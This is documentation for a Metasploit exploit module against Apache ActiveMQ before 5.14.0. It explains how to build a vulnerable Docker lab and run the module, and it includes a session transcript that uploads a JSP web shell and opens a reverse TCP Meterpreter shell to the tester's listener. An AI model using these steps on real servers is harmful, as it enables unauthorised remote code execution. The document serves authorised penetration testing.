## Vulnerable Application

This module exploits a vulnerability in Apache ActiveMQ 5.x before 5.14.0 which
allows remote attackers to upload and execute arbitrary files via an HTTP PUT
followed by an HTTP MOVE request. By default, a JSP web shell and Java
Meterpreter payload are uploaded to the `/fileserver/` path of a vulnerable
server, then moved via an HTTP MOVE request to either `/api/` or `/admin/`.
You should get a shell as the user running ActiveMQ.

### Configuring a Vulnerable Environment

To use a pre-built Docker image:

```
docker run -it -p 8161:8161 rmohr/activemq:5.10.0
```

To run an older version of ActiveMQ with Java 8, create a new `Dockerfile`:

```
FROM openjdk:8

ENV ACTIVEMQ_VERSION 5.9.0
ENV ACTIVEMQ apache-activemq-$ACTIVEMQ_VERSION

ENV ACTIVEMQ_HOME /opt/activemq

RUN \
    curl -O http://archive.apache.org/dist/activemq/apache-activemq/$ACTIVEMQ_VERSION/$ACTIVEMQ-bin.tar.gz && \
    mkdir -p /opt && \
    tar xf $ACTIVEMQ-bin.tar.gz -C /opt/ && \
    rm $ACTIVEMQ-bin.tar.gz && \
    ln -s /opt/$ACTIVEMQ $ACTIVEMQ_HOME && \
    useradd -r -M -d $ACTIVEMQ_HOME activemq && \
    chown activemq:activemq /opt/$ACTIVEMQ -R

USER activemq

WORKDIR $ACTIVEMQ_HOME
EXPOSE 61616 8161

CMD ["/bin/bash", "-c", "bin/activemq console"]
```

Next build and run the application:

```
docker build -t activemq:5.9.0 .
docker run -it -p 8161:8161 activemq:5.9.0
```

Verify the application is running by visiting
`http://localhost:8161/admin/test/` with the credentials `admin:admin`

## Verification Steps

1. Run the application locally.
1. Start msfconsole.
1. Do: `use multi/http/apache_activemq_upload_jsp`.
1. Do: `set rhosts <ip address of remote host> `.
1. Do: `set lhost <ip address of local machine`.
1. Do: `run`.
1. You should get a shell under the process running ActiveMQ.

## Options

### AutoCleanup

Remove web shells from the target system after callback is received (Default:
true)

### BasicAuthUser

User-supplied username (Default: admin)

### BasicAuthPass

User-supplied password associated with username (Default: admin)

### JSP

Desired name to assign to the JSP web shell when it is uploaded to the target
system. Do not include the `.jsp` extension (Default: randomly-generated string)

## Advanced Options

### UploadPath

Custom path into which web shells will be uploaded on the target system. If the
user determines that a nonstandard directory is able to execute .jsp files, the
user can specify this directory for exploitation (Default: attempt `/api/`; if that
fails, attempt `/admin/`)

## Scenarios

### Targeting ActiveMQ 5.9.0

```
$ msfconsole -q
msf6 > use multi/http/apache_activemq_upload_jsp
[*] Using configured payload java/meterpreter/reverse_tcp
msf6 exploit(multi/http/apache_activemq_upload_jsp) > set LHOST 172.18.0.1
LHOST => 172.18.0.1
msf6 exploit(multi/http/apache_activemq_upload_jsp) > set RHOST 127.0.0.1
RHOST => 127.0.0.1
msf6 exploit(multi/http/apache_activemq_upload_jsp) > show options

Module options (exploit/multi/http/apache_activemq_upload_jsp):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   AutoCleanup    true             no        Remove web shells after callback is received
   BasicAuthPass  admin            yes       The password for the specified username
   BasicAuthUser  admin            yes       The username to authenticate as
   JSP                             no        JSP name to use, excluding the .jsp extension (default: random)
   Proxies                         no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS         127.0.0.1        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT          8161             yes       The target port (TCP)
   SSL            false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                           no        HTTP server virtual host


Payload options (java/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.18.0.1       yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Java Universal


msf6 exploit(multi/http/apache_activemq_upload_jsp) > exploit

[*] Started reverse TCP handler on 172.18.0.1:4444
[*] Uploading http://127.0.0.1:8161//opt/activemq/webapps/api//mNhqqxqibzBbGvw.jar
[*] Uploading http://127.0.0.1:8161//opt/activemq/webapps/api//mNhqqxqibzBbGvw.jsp
[*] Sending stage (58082 bytes) to 172.18.0.2
[+] Deleted /opt/activemq/webapps/api//mNhqqxqibzBbGvw.jar
[+] Deleted /opt/activemq/webapps/api//mNhqqxqibzBbGvw.jsp
[*] Meterpreter session 2 opened (172.18.0.1:4444 -> 172.18.0.2:52620) at 2021-06-14 14:55:52 -0500

meterpreter > getuid
Server username: activemq
meterpreter > sysinfo
Computer    : e0acc262f573
OS          : Linux 5.8.0-55-generic (amd64)
Meterpreter : java/linux
meterpreter >
```
